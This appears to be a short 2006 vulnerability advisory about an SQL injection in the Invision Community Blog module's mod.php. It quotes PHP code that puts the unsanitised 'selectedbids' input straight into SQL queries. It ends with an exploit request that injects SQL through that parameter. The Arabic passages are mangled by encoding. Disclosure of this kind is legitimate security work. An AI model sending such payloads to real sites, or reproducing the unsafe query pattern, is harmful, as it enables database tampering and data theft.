Invision Community Blog .. Bugs

Fri, 05 May 2006 11:25:36 -0700 

[LEFT]

Invision Community Blog .. Bugs


SQL Injection :-


    Filename      :- mod.php

    Function name :- do_mmod()


The $ids Unfilter Input By Intval As Array :) So We Can Do SQL Injection -->

* Arabic *

[/LEFT]

[RIGHT]

ÇáãÊÛíÑ $ids ÛíÑ ãÝáÊÑ Úä ØÑíÞ ÇáÏÇáå intval æåæ ÈÔßá ãÕÝæÝå .. áåÐÇ ÇáÓÈÈ ããßä 
Úãá ÷ÍÞäå

[/RIGHT]

[LEFT]

[php]

$ids = array();

$ids = explode( ',', $this->ipsclass->input['selectedbids'] );


...


$ids = implode( ',', $ids );


...


$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 1 ), 
"blog_id IN ({$ids})" );

$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' 
=> 'blog_blogs', 'where' => "blog_id IN ({$ids})" ) );

$this->ipsclass->DB->simple_exec();


....


$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 0 ), 
"blog_id IN ({$ids})");

$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' 
=> 'blog_blogs', 'where' => "blog_id IN ({$ids})" ) );


....


[/php]

[/LEFT]

[RIGHT]

*ÇáÇÓÊÛáÇá*

[/RIGHT]

[LEFT]

Exploit :-


    GET ^

        /IBP/index.php?

    POST ^

        
automodule=blog&req=blogmmod&auth_key=[auth_key]&selectedbids=-1,-1)[SQL]&blogact=unpin

[/LEFT]

Reply via email to